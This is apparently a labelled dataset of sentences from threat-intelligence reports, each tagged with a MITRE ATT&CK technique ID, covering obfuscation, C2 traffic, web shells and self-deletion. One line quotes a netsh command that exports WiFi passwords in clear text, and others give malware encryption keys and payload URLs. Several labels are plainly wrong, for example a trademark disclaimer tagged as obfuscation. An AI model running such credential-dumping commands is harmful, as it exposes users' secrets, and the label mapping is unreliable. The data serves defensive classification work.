{"text1":"The HyperShell and HighShell webshells are variants of what we track as TwoFace, with HyperShell being related to the TwoFace loader and HighShell being related to the TwoFace payload, as we reported in July 2017","labels":"['T1027']"}
{"text1":"Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim\u2019s data","labels":"['T1027']"}
{"text1":"Configuration Config.ini is the file where the malware stores its encrypted configuration data","labels":"['T1027']"}
{"text1":"While performing the analysis on the delivery documents using the .sct file AppLocker bypass, we noticed the C# payload was functionally similar to the original RogueRobin payload","labels":"['T1027']"}
{"text1":"Figure 3 Targeted lure content In one of the documents, the victim is presented with what appears to be an obfuscated document with the NATO EOD seal and text alluding to the targeted nation state","labels":"['T1027']"}
{"text1":"WindowsDefender.ini \u2013 The Base64 encoded and obfuscated PowerShell script","labels":"['T1027']"}
{"text1":"Figure 3: The first step of decryption will perform XOR on one byte using the previous adjacent byte, starting from the last byte and excluding the first byte  Figure 4: The second step uses RC4, using the first 0x20 bytes from the result of the first step as the RC4 key  Figure 5: Encrypted (Top) and decrypted (bottom) configuration file It is also important to note that while the loader component and the configuration file are located in the same directory (%windows%\\system32), the encrypted backdoor is located in a different directory (%Program Files%\\Common Files\\System\\ado)","labels":"['T1027']"}
{"text1":"All strings used by the Trojan are encrypted with the XOR algorithm","labels":"['T1027']"}
{"text1":"Next, the buffer is encrypted using the RC4 algorithm with the 50-byte key (also stored in the backdoor\u2019s body)","labels":"['T1027']"}
{"text1":"11 bytes of this buffer are encrypted with the XOR algorithm as follows: i = 0 while ( 1 ) {   crypted_buffer = (_BYTE *)this_->crypted_buffer;   if ( i gt;= this-gt;crypted_buffer_size - 4 ) \/\/ this-gt;crypted_buffer_size == 15     break;   ++i;   crypted_buffer[i + 4] ^= crypted_buffer[i & 3];  The generated buffer in encoded using the BASE64 alphabet, where the last two characters are replaced with \u201c-\u201d and \u201c_\u201d","labels":"['T1027']"}
{"text1":"Next, to the beginning of the BASE64 string a random BASE64 string with the length of 5 characters is added","labels":"['T1027']"}
{"text1":"The first 11 bytes of the received buffer are encrypted with the XOR algorithm","labels":"['T1027']"}
{"text1":"Once it is encrypted using the XOR algorithm, the buffer is encoded with BASE64","labels":"['T1027']"}
{"text1":"These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer","labels":"['T1027']"}
{"text1":"Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES","labels":"['T1027']"}
{"text1":"Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related","labels":"['T1027']"}
{"text1":"Specifically, the following GitHub repositories appear to be controlled by the MuddyWater threat actor(s):  [unknown SHA256]  Downloads payload from: hxxps:\/\/raw.githubusercontent[.]com\/F0R3X\/BrowserFontArabic\/master\/ArabicBrowserFont.exe   [unknown SHA256]  Downloads payload from: hxxps:\/\/raw.githubusercontent[.]com\/F0R3X\/BrowserFontArabic\/master\/FontArabic.exe     9b5e36bb7518a9e333c31d09b589102f89e3425571dd434820ab3c437dc4e0d9 (and several others)  Downloads payload from: hxxps:\/\/raw.githubusercontent[.]com\/ReactDeveloper2017\/react\/master\/src\/test\/test.js    Interestingly, both profiles were populated with forked repositories to give them an air of legitimacy as shown in figure 2","labels":"['T1027']"}
{"text1":"The domain names differed but the script adheres to the same logic (including the logic function).\u201d The DNSMessenger malware is an obfuscated and customized version of the popular DNS_TXT_PWNAGE.ps1 script available on GitHub and is also referred to by FireEye as POWERSOURCE","labels":"['T1027']"}
{"text1":"Malicious obfuscated VBA code is executed when the macro is first enabled","labels":"['T1027']"}
{"text1":"In our analysis, the macro is obfuscated, character by character, using the decimal ASCII code","labels":"['T1027']"}
{"text1":"There are two forms of encrypted strings: an RSA256-encrypted string, and custom base64-encoded and RSA256-encrypted string","labels":"['T1027']"}
{"text1":"At face value, this current variant of OopsIE has a vast majority of its strings obfuscated, which can be deobfuscated by splitting the strings using the hyphen as a delimiter, treating each split value as an integer, subtracting one from each integer and converting each into a character","labels":"['T1027']"}
{"text1":"This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses","labels":"['T1027']"}
{"text1":"Invoke-Obfuscation calls the variable obfuscation technique used by the actors to obfuscate this script Random Case + {} + Ticks, which changes all variables in the script to have randomly cased characters, to be surrounded in curly braces and to include the tick (`) character, which is ignored in by PowerShell","labels":"['T1027']"}
{"text1":"By applying two specific obfuscation techniques within Invoke-Obfuscation, we were able to create an obfuscated PowerShell script that was very similar to the QUADAGENT payloads delivered in the attacks discussed in this blog","labels":"['T1027']"}
{"text1":"All the strings and settings were encrypted and obfuscated","labels":"['T1027']"}
{"text1":"The configuration and strings are encrypted using 3DES and Base64 encoding","labels":"['T1027']"}
{"text1":"The shellcode is not encrypted but is obfuscated","labels":"['T1027']"}
{"text1":"Decrypting the Configuration As previously mentioned, the real configuration data is stored in the first stage shellcode but it is not stored in cleartext, but encrypted and compressed","labels":"['T1027']"}
{"text1":"The configuration data is encrypted with the same algorithm described previously by JPCert but using a different XOR value","labels":"['T1027']"}
{"text1":"The configuration blob is encoded using a simple single-byte XOR scheme","labels":"['T1027']"}
{"text1":"KopiLuwak In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world)","labels":"['T1027']"}
{"text1":"Figure 3: no detections for SpeakUp in Virus Total In an attempt to endure the investigation process by security researchers, the second stage payload was encoded with salted base64","labels":"['T1027']"}
{"text1":"Some strings are obfuscated with XOR x56","labels":"['T1027']"}
{"text1":"These files are stored within an 217kb encrypted cab file in the dropper\u2019s resources under the name \u201cA\u201d","labels":"['T1027']"}
{"text1":"The cab file was encrypted and decrypted using a simple xor cipher with a rotating 16 byte key: \\x36\\x11\\xdd\\x08\\xac\\x4b\\x72\\xf8\\x51\\x04\\x68\\x2e\\x3e\\x38\\x64\\x32","labels":"['T1027']"}
{"text1":"This is encrypted by RC4, using the key {0xb5, 0x78, 0x62, 0x52, 0x98, 0x3e, 0x24, 0xd7, 0x3b, 0xc6, 0xee, 0x7c, 0xb9, 0xed, 0x91, 0x62}","labels":"['T1027']"}
{"text1":"We\u2019ve identified two such files: settings.db sdfg3d.db Here\u2019s how such a database file appears:  These are BASE64 encoded and use the same RC4 encryption key as the malware configuration","labels":"['T1027']"}
{"text1":"The CARROTBAT malware family is a somewhat unique dropper and while it supports various types of decoy documents, and employs rudimentary command obfuscation, it should be made clear that it is not sophisticated","labels":"['T1027']"}
{"text1":"HttpBrowser's executable code may be obfuscated through structured exception handling and return-oriented programming","labels":"['T1027']"}
{"text1":"All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks","labels":"['T1027']"}
{"text1":"Figure 7: The same de-obfuscated code as Figure 2 The only other script content of the blog-page[.]html is an empty script section","labels":"['T1027']"}
{"text1":"PlayList.vbs contains the obfuscated codes, which it executes after decrypting the obfuscations.","labels":"['T1027']"}
{"text1":"Once executed, Vcrodat loads an encrypted payload on to the victim\u2019s computer.","labels":"['T1027']"}
{"text1":"The JavaScript is heavily obfuscated. The first variable\u2014a\u2014is an array of obfuscated values","labels":"['T1027']"}
{"text1":"This shellcode is decrypted in memory through EQENDT32.EXE","labels":"['T1027']"}
{"text1":"The encrypted file contains a config file of 0x78 bytes. The data is decrypted with an 0xD9 XOR operation.","labels":"['T1027']"}
{"text1":"The actors have made some small changes, such as altering the variable names to avoid Yara detection","labels":"['T1027']"}
{"text1":"To operate and evade standard analysis tools, most of the functions are hashed","labels":"['T1027']"}
{"text1":"The encryption\/decryption routine (refer to Figure 5) can be summarized as follows:      Figure 5: Encryption\/ Decryption Function  Generate an array of integers from 0x00 to 0xff Scrambles the state of the table using the given key Encrypts or decrypts a string using the scrambled table from (b)","labels":"['T1573']"}
{"text1":"Version 2 Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session","labels":"['T1573']"}
{"text1":"A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code","labels":"['T1573']"}
{"text1":"After applying this decryption algorithm, we are presented with the following data: h=HOSTNAME-PC&f=mission.ini&c=& The response made by the C2 server uses the same RC4 key for encryption","labels":"['T1573']"}
{"text1":"The BONDUPDATER script, which was named based on the hard-coded string \u201cB007\u201d, uses a custom DGA algorithm to generate subdomains for communication with the C2 server","labels":"['T1573']"}
{"text1":"Figure 9: Example Network Communication In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response","labels":"['T1573']"}
{"text1":"The structure of each of these outbound DNS requests is as follows: <system ID>-<job ID>-<offset in data><more data flag>-<random length of base64 encoded data between 30 and 42 characters>.<c2 domain> The payload will look for different responses to these outbound queries depending on the type of DNS request that the payload uses to communicate with the C2","labels":"['T1573']"}
{"text1":"The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie","labels":"['T1573']"}
{"text1":"<encoded system data>.<same random number between 100000 and 999999 above>.<c2 name> \u00a0 After obtaining a session ID and pre-shared key, the PowerShell script will continue to communicate with its C2 server to obtain data to treat as a command","labels":"['T1573']"}
{"text1":"Instead, it immediately issues a query to resolve the following domain, which embeds the session ID value to transmit it to the C2: \u00a0 <encoded session id>.<same random number between 100000 and 999999>.<c2 domain name> \u00a0 To transmit the data via the DNS tunneling, the C2 server will respond to the above query with an IPv6 address that contains the number of DNS queries the payload must issue to obtain the entirety of the data from subsequent IPv6 answers","labels":"['T1573']"}
{"text1":"The script will send the specified number of DNS queries using the following format, each of which the C2 will respond with an IPv6 address that the script will treat as a string of data: \u00a0 www.<sequence number>.<same random number between 100000 and 999999>.<c2 domain name> \u00a0 The payload will treat the data provided by the C2 as a message, which will have the following structure: \u00a0 hello<char uuid[35]><char type[1]><data> \u00a0 The message will start with the string hello followed by a 35-character UUID string","labels":"['T1573']"}
{"text1":"Neither this new domain nor the IP it resolves to have been observed in the past, indicating that the sample in Table 3 may be associated with a newer campaign","labels":"['T1016']"}
{"text1":"Table 4: URL parameters Additionally, the command string is hashed using the same RGPH hashing algorithm as before","labels":"['T1016']"}
{"text1":"In one instance, a log file recovered from an open indexed server revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines","labels":"['T1016']"}
{"text1":"APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration","labels":"['T1016']"}
{"text1":"In order to decide which domain xparis() holds, a variable pingadori() uses the radador() function to randomize the domain","labels":"['T1016']"}
{"text1":"Instructions within guide.txt explaining how to carry out DNS hijacking attack In one part of guide.txt, an example target appears to be provided, with a corresponding adversary IP (185.162.235[.]106) for the legitimate domain to be redirected to","labels":"['T1016']"}
{"text1":"Note that IP addresses can be reallocated","labels":"['T1016']"}
{"text1":"Backdoor.Pirpi also collects information about the target\u2019s local network, including the domain controller and workstations","labels":"['T1016']"}
{"text1":"Examining historical IP resolutions revealed a common IP between the active nameservers, 107.175.75[.]123","labels":"['T1016']"}
{"text1":"This IP is of particular interest as historical domain resolutions of this IP revealed that it had resolved to the domain hotmai1l[.]com in the past as well, which was a domain we had previously identified as having a high likelihood of association with DarkHydrus infrastructure","labels":"['T1016']"}
{"text1":"This IP also belongs to the same service provider and class B network range as another IP we had associated with DarkHydrus, 107.175.150[.]113 which specifically resolved to a domain name containing a victim organization\u2019s name","labels":"['T1016']"}
{"text1":"After the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server, effectively changing the address the malware will communicate with","labels":"['T1016']"}
{"text1":"FBI has high confidence that HIDDEN COBRA actors are using the IP addresses for further network exploitation.This alert includes technical indicators related to specific North Korean government cyber operations and provides suggested response actions to those indicators, recommended mitigation techniques, and information on reporting incidents to the U.S","labels":"['T1016']"}
{"text1":"DHS and FBI recommend that network administrators review the IP addresses, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization.When reviewing network perimeter logs for the IP addresses, organizations may find numerous instances of these IP addresses attempting to connect to their systems","labels":"['T1016']"}
{"text1":"The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system","labels":"['T1016']"}
{"text1":"When we analyzed the email headers, we determined that the email was sent from an SMTP server using an IP associated with the Yonsei University network","labels":"['T1016']"}
{"text1":"text=  from=  ai= ags=  oe= aq= btnG=  oprnd=  ai= utm=  channel=  The page address in the domain of the command and control server is chosen randomly from the list","labels":"['T1016']"}
{"text1":"Analysis of their configurations show that the C2 servers used both fully-qualified domain names and IP addresses","labels":"['T1016']"}
{"text1":"The code will gather some information about the system, specifically the local IP address, MAC address, and the external IP address of the system","labels":"['T1016']"}
{"text1":"Similar to Reaver as posted by Palo Alto, it gets the IP or domain of the C&C server, the port, name of the binary, a sleep timer, and what Palo Alto calls a \u201ccampaign identifier.\u201d Technical Details At this moment, we were unable to retrieve the original infection vector and other information regarding what other tools the APT15 group is using to attack their targets","labels":"['T1016']"}
{"text1":"Victim system reconnaissance The code then tries to obtain the victim\u2019s public IP via \u201chttps:\/\/api.ipify.org\/\u201d","labels":"['T1016']"}
{"text1":"If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1","labels":"['T1016']"}
{"text1":"It is unknown what these domains may have been used for but based on the similarity of domain spoofing and sharing an IP, they are likely part of the adversary infrastructure","labels":"['T1016']"}
{"text1":"Inspecting the class C network for 185.162.235.0\/24 shows us that another IP on the same network resolves to an OilRig domain, msoffice-cdn[.]com which we identified in August 2017","labels":"['T1016']"}
{"text1":"The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"05 01 00 01 c0 b8 3c e5 00 51\" and verifies that the first two bytes from the server are \"05 00\" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order)","labels":"['T1016']"}
{"text1":"The chinapolicyanalysis.org domain was used as the sender address, as well as the hosting location of the malicious RTF document","labels":"['T1016']"}
{"text1":"The mericcs.org domain was used as the sender address, as well as the hosting location of the malicious RTF document","labels":"['T1016']"}
{"text1":"The structure of the domain mimics the Mercator Institute for China Studies (MERICS), whose actual domain is merics.org","labels":"['T1016']"}
{"text1":"Network Indicators\u200b     Hostname IP Address Notes   mailcenter.support 221.121.138.139 Domain used to for sending spear phishes and user tracking","labels":"['T1016']"}
{"text1":"chinapolicyanalysis.org 185.130.212.168 Domain used for spear phish sender e-mail address and to host malicious documents","labels":"['T1016']"}
{"text1":"fprii.net 185.130.212.254 Domain used for spear phish sender e-mail address and to host malicious documents","labels":"['T1016']"}
{"text1":"mericcs.org 221.121.138.141 Domain used for spear phish sender e-mail address and to host malicious documents","labels":"['T1016']"}
{"text1":"In February 2018, several KHRAT associated domains began resolving to the IP address 89.46.222[.]97","labels":"['T1016']"}
{"text1":"One of these domains, facebook-apps[.]com, was identified in one of the malware samples associated with this IP address","labels":"['T1016']"}
{"text1":"The diagram in Figure 1 shows the samples, domains, IP addresses and e-mail addresses that we identified during our investigation (See Appendix B\u00a0for more detail on these.) There is a clear split between Cluster A and Cluster B, with no infrastructure overlap between the two","labels":"['T1016']"}
{"text1":"One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all local host\u2019s WiFi profiles (settings and passwords) to %APPDATA%\\<profile>.xml with a command line call: cmd.exe \/c netsh wlan export profile key=clear folder=\"%APPDATA%\" They then gather more network information with a call to ipconfig and arp -a","labels":"['T1016']"}
{"text1":"hxxp:\/\/www.sanjosemaristas[.]com\/app\/index.php?{A01BA0AD-9BB3-4F38-B76B-A00AD11CBAAA}, providing the current network adapter\u2019s service name GUID","labels":"['T1016']"}
{"text1":"In Figure 9, below, red indicates targeted IP addresses, malware, registrant information, and domains associated with the targeted attack campaign while blue indicates criminal attack IP addresses, malware used, registrant information, and domains:  Figure 9","labels":"['T1016']"}
{"text1":"(Source: Dell SecureWorks) As shown in Figure 10, the unpacked JavaScript code reveals an iframe pointing to an IP address that is hosting the exploit","labels":"['T1016']"}
{"text1":"It is a preferred platform within data centers and the cloud for businesses, as well as an ongoing favorite when it comes to a majority of Internet-facing web and application servers","labels":"['T1505.003']"}
{"text1":"Furthermore, this group has routinely identified and exploited vulnerable web servers of targeted organizations to install web shells, such as ANTAK and ASPXSPY, and used stolen legitimate credentials to compromise externally facing Outlook Web Access (OWA) resources","labels":"['T1505.003']"}
{"text1":"Attack Lifecycle  Initial Compromise APT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises","labels":"['T1505.003']"}
{"text1":"Web shells are heavily relied on for nearly all stages of the attack lifecycle","labels":"['T1505.003']"}
{"text1":"Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups","labels":"['T1505.003']"}
{"text1":"Maintain Presence APT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment","labels":"['T1505.003']"}
{"text1":"APT40 strongly favors web shells for maintaining presence, especially publicly available tools","labels":"['T1505.003']"}
{"text1":"OwaAuth \u2014 This web shell and credential stealer deployed to Microsoft Exchange servers is installed as an ISAPI filter","labels":"['T1505.003']"}
{"text1":"(Source: SecureWorks)  China Chopper web shell \u2014 This web-based executable script communicates with a full-featured user interface to allow threat actors to transfer and create files, open a command terminal, and interact with database servers","labels":"['T1505.003']"}
{"text1":"(Source: SecureWorks) In multiple instances, CTU researchers observed artifacts from unsuccessful attempts to create a web shell on web-accessible JBOSS-based service desk software, followed by use of a functional shell to gain access to the environment","labels":"['T1505.003']"}
{"text1":"(Source: SecureWorks) Reentry attempt After BRONZE UNION was evicted from a compromised environment, which involved blocking the group's known infrastructure, CTU researchers observed the group attempting to reconnect to its OWA web shells and a backup web shell it had deployed during the intrusion","labels":"['T1505.003']"}
{"text1":"To report an intrusion and request resources for incident response or technical assistance, you are encouraged to contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), the FBI through a local field office, or the FBI\u2019s Cyber Division (CyWatch@fbi.gov or 855-292-3937).Protect Against SQL Injection and Other Attacks on Web ServicesTo protect against code injections and other attacks, system operators should routinely evaluate known and published vulnerabilities, periodically perform software updates and technology refreshes, and audit external-facing systems for known web application vulnerabilities","labels":"['T1505.003']"}
{"text1":"They should also take the following steps to harden both web applications and the servers hosting them to reduce the risk of network intrusion via this vector.Use and configure available firewalls to block attacks.Take steps to secure Windows systems, such as installing and configuring Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET) and Microsoft AppLocker.Monitor and remove any unauthorized code present in any www directories.Disable, discontinue, or disallow the use of Internet Control Message Protocol (ICMP) and Simple Network Management Protocol (SNMP) as much as possible.Remove unnecessary HTTP verbs from web servers","labels":"['T1505.003']"}
{"text1":"Typical web servers and applications only require GET, POST, and HEAD.Where possible, minimize server fingerprinting by configuring web servers to avoid responding with banners identifying the server software and version number.Secure both the operating system and the application.Update and patch production servers regularly.Disable potentially harmful SQL-stored procedure calls.Sanitize and validate input to ensure that it is properly typed and does not contain escaped code.Consider using type-safe stored procedures and prepared statements.Audit transaction logs regularly for suspicious activity.Perform penetration testing on web services.Ensure error messages are generic and do not expose too much information.Permissions, Privileges, and Access ControlsSystem operators should take the following steps to limit permissions, privileges, and access controls.Reduce privileges to only those needed for a user\u2019s duties.Restrict users\u2019 ability (permissions) to install and run unwanted software applications, and apply the principle of \u201cLeast Privilege\u201d to all systems and services","labels":"['T1505.003']"}
{"text1":"Additionally, on that same url, http:\/\/mdzz2019.noip[.]cn:3654\/ is used to distribute more versions of this Gh0stRAT sample, along with a .zip file containing ASPXSpy, a web shell","labels":"['T1505.003']"}
{"text1":"Audit ISAPI filters and search for web shells on Microsoft Exchange servers","labels":"['T1505.003']"}
{"text1":"(Source: Dell SecureWorks) Passwords, like \"admin-na-google123!@#\" shown in Figure 4, are required to interact with the web shell","labels":"['T1505.003']"}
{"text1":"TG-3390 has used additional web shells containing similarly formatted passwords","labels":"['T1505.003']"}
{"text1":"However, the OwaAuth web shell password contains the victim organization's name","labels":"['T1505.003']"}
{"text1":"More information about the OwaAuth web shell is available in Appendix C","labels":"['T1505.003']"}
{"text1":"ASPXTool \u2014 A modified version of the ASPXSpy web shell (see Figure 6)","labels":"['T1505.003']"}
{"text1":"The OwaAuth web shell is likely created with a builder, given that the PE compile time of the binary does not change between instances and the configuration fields are padded to a specific size","labels":"['T1505.003']"}
{"text1":"The adversaries modify publicly available tools such as ASPXSpy to remove identifying characteristics that network defenders use to identify web shells","labels":"['T1505.003']"}
{"text1":"TG-3390 actors have deployed the OwaAuth web shell to Exchange servers, disguising it as an ISAPI filter","labels":"['T1505.003']"}
{"text1":"They then identify the Exchange server and attempt to install the OwaAuth web shell","labels":"['T1505.003']"}
{"text1":"If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells","labels":"['T1505.003']"}
{"text1":"(Source: Dell SecureWorks) To facilitate lateral movement, the adversaries deploy ASPXTool web shells to internally accessible systems running IIS","labels":"['T1505.003']"}
{"text1":"Mapping of TG-3390's interactions with web shells during an intrusion responded to by CTU researchers","labels":"['T1505.003']"}
{"text1":"OwaAuth web shell PDB string","labels":"['T1505.003']"}
{"text1":"Each web shell instance is configured to contain SP, Key, and Log variables","labels":"['T1505.003']"}
{"text1":"OwaAuth web shell command set","labels":"['T1505.003']"}
{"text1":"The stylecs.aspx webshell provides fairly significant functionality, as its developer wrote this webshell in JScript that ultimately runs any supplied JScript code provided to it within the HTTP request..","labels":"['T1505.003']"}
{"text1":"The MPK Trojan also monitors specifically for windows that are likely to contain login forms for popular web-based email clients, such as titles that contain: \u201cGmail -\u201d \u201cYahoo \u2013 login\u201d \u201cSign In -\u201d \u201cOutlook.com -\u201c MPK will attempt to parse these window titles to identify the associated email address and record these to the log file using the following format: \/\/\/\/\/\/\/\/\/\/\/\/\/ Mail Find <email address> \/\/\/\/\/\/\/\/\/\/\/ If the Trojan does not find the window titles associated with Gmail, Yahoo or Outlook, it saves the title to the \u201cSave.tmp\u201d file in the following format: +++++++++++++ Window= <window title> +++++++++++++ The major difference between the IRC variant and non-IRC variant of MPK is the C2 protocol used","labels":"['T1010']"}
{"text1":"Offset Description   0x0 Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3)   0x25 Victim IP Address (192.168.180.154)   0x45 Command (0x66660001)   0x49 Length of payload (0x2f \u2013 47)   0x4d Field 1 \u2013 Windows major version (0x6 \u2013 Windows Vista+)   0x51 Field 2 \u2013 Windows minor version (0x1 \u2013 Windows 7)   0x55 Field 3 \u2013 Unknown (0x20)   0x59 Payload (default flag:4\/2\/2018 1:01:33 AM)    Table 5 \u2013 Beacon structure for PLAINTEE","labels":"['T1010']"}
{"text1":"Linux malware detection and prevention is not prevalent at this time, but Palo Alto Networks customers are protected through our next-generation security platform:  IPS signature 14917 deployed to identify and prevent command and control activity The C2 domains and files mentioned in this report are blocked in our Threat Prevention product","labels":"['T1070.004']"}
{"text1":"The organization managed to discover what scripts were hosted on the server before BE\/SandWorm gang deleted them, and\u00a0unfortunately couldn\u2019t restore them after they were deleted","labels":"['T1070.004']"}
{"text1":"For example, at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network","labels":"['T1070.004']"}
{"text1":"After running within the %TEMP% path, Comnie will delete the original file","labels":"['T1070.004']"}
{"text1":"KEYS Deletes the file named by tempPath + \u201cky\u201d file so as not to upload anything","labels":"['T1070.004']"}
{"text1":"HDS Deletes the file created by the HD command to reverse the effect","labels":"['T1070.004']"}
{"text1":"DEL-TEMP Deletes all files in the \u201cAppData\/Local\/Temp\u201d path","labels":"['T1070.004']"}
{"text1":"Overwrite a file with all zeros and mark it for deletion on reboot  Wiping files with zeros and marking it for deletion on reboot.\u00a0  Delete files using the DeleteFile() API Load an arbitrary library into its process space","labels":"['T1070.004']"}
{"text1":"The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration","labels":"['T1070.004']"}
{"text1":"Appendix Malware Family Descriptions    Malware Family  Description  Availability    DROPSHOT  Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware  Non-Public    NANOCORE  Publicly available remote access Trojan (RAT) available for purchase","labels":"['T1070.004']"}
{"text1":"The message sent to the C2 will be \u201cfile is deleted.\u201d if successful or \u201cfile is not deleted.\u201d if unsuccessful","labels":"['T1070.004']"}
{"text1":"The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section","labels":"['T1070.004']"}
{"text1":"The dropper will delete itself at the end of the process","labels":"['T1070.004']"}
{"text1":"After this file is copied, the original \u2018Update.~tmp\u2019 file is deleted","labels":"['T1070.004']"}
{"text1":"boom! Deletes GID.bin, ShwDoc.VBS and ShwDoc.srv files, as well as the scheduled task whose name a GUID stored in the GID.bin file","labels":"['T1070.004']"}
{"text1":"Also, the x command will delete the generated registry key and the Office365DCOMCheck\/SystemDiskClean scheduled task","labels":"['T1070.004']"}
{"text1":"This system configuration file (in.sys) will drop a backdoor installer (UserInstall.exe) then delete itself","labels":"['T1070.004']"}
{"text1":"and then deletes the original launcher","labels":"['T1070.004']"}
{"text1":"This version of the campaign made malicious use of unins000.exe, a process that belongs to the Brazilian information security company GAS Tecnologia, to gather personal information undetected","labels":"['T1082']"}
{"text1":"The autonomous system name of the IP shows that the allocation is controlled by Serverius Holding B.V., which is an autonomous system name we have previously seen associated with the OilRig group","labels":"['T1082']"}
{"text1":"This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities","labels":"['T1082']"}
{"text1":"The data above contains the hostname (\u2018HOSTNAME-PC\u2019) of the victim machine, as well as an instruction","labels":"['T1082']"}
{"text1":"To obtain a job, the Trojan builds a subdomain that has the following structure and issues a DNS query to the C2 server: c<unique identifier><job identifier padded with \u20180\u2019 to make three digits><sequence number>c The generated subdomain is then subjected to a number-to-character substitution function that is the inverse of the Table 4, which effectively converts all the digits in the subdomain into characters","labels":"['T1082']"}
{"text1":"Once the second DLL is executed, it gathers information about the victim system\u2019s setup, such as operating system version, and driver and processor information","labels":"['T1082']"}
{"text1":"One computer that was infected with both Cadelspy and Remexi was a system that ran a SIM card editing application","labels":"['T1082']"}
{"text1":"Other functionalities provided by this section of the PowerShell Script are as follows:  Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username    All of this data is concatenated and formatted as shown in Figure 13:    Figure 13: Concatenated and formatted data retrieved by PowerShell script  Register the victim\u2019s machine to the C2 server by sending the REGISTER command to the server","labels":"['T1082']"}
{"text1":"Freenki is used to gather information about the infected system and to download a subsequent stage payload","labels":"['T1082']"}
{"text1":"The information this malware collected included the following:The computer nameThe usernameThe execution path of the sampleThe BIOS modelA randomly-generated ID to uniquely identify the systemGroup123 utilized this method to ensure their victim was (a) someone they wanted to target further and (b) someone they could infect further based on the information obtained from the reconnaissance phase","labels":"['T1082']"}
{"text1":"After connecting to the IRC server, the MPK bot sends custom ping messages and provides an introduction via a \u201c!Hello\u201d message that contains the current logged in user of the infected host, if the user has administrator privileges, the hostname, the UUID of the system, and operating system version","labels":"['T1082']"}
{"text1":"The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, processor architecture and two additional values, which are \u201c1.3\u201d and \u201cKdfrJKN\u201d","labels":"['T1082']"}
{"text1":"As we can see, the following information is present within this configuration:  Remote Command and Control (C2) server Remote port Sleep timer  Reaver continues to collect various information from the victim machine, including the following:  CPU speed Computer name Username IP Address Microsoft Windows version Physical and virtual memory information  The malware proceeds to communicate with the remote server via HTTP GET and POST requests","labels":"['T1082']"}
{"text1":"Reaver continues to collect various information from the victim machine, including the following:  Computer name Volume serial number Microsoft Windows version CPU speed ANSI code page OEM code page identifier for the operating system Physical and virtual memory information  Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified","labels":"['T1082']"}
{"text1":"Here is an example of the result of ps\u00a0ax on an infected system:       $ ps ax[...] 566 ?? Ss 0:00.01 \/usr\/libexec\/icloudsyncd -launchd netlogon.bundle[...]     Figure 8: Result of ps ax on an infected system Keychain stealing The OSX\/Keydnap backdoor is equipped with a mechanism to gather and exfiltrate passwords and keys stored in OS X\u2019s keychain","labels":"['T1082']"}
{"text1":"This phase will often leverage a specialized tool that automatically collects a wide array of information including credentials, group management policies, and even system logs to better hone further attacks and assure execution of their malware","labels":"['T1082']"}
{"text1":"A noteworthy addition to the Poseidon toolkit is the IGT supertool (Information Gathering toolkit), a bulking 15 megabyte executable that orchestrates a series of different information collections steps, exfiltration, and the cleanup of components","labels":"['T1082']"}
{"text1":"A multilayered approach is a must to securing the organization\u2019s perimeter, especially for information security professionals and system\/IT administrators","labels":"['T1082']"}
{"text1":"This variation of the Zebrocy downloader begins by gathering the serial number for the storage volume with the label \u201cC:\\\u201d and the computer name","labels":"['T1082']"}
{"text1":"Download & execute Startup (with persistence) Collection of system information (OS, version, installed location, etc.) Self-update Uninstall  This project was created by a user called zettabithf which is linked to a user with the same name in Hack Forums","labels":"['T1082']"}
{"text1":"Low confidence generally means that the information's credibility and\/or plausibility is questionable, or that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that [there are] significant concerns or problems with the sources","labels":"['T1082']"}
{"text1":"The verb get can be used in a myriad of ways to retrieve information for a machine, however in this case os get \/format: is being abused to download payloads from non-local resources with .xsl extensions","labels":"['T1082']"}
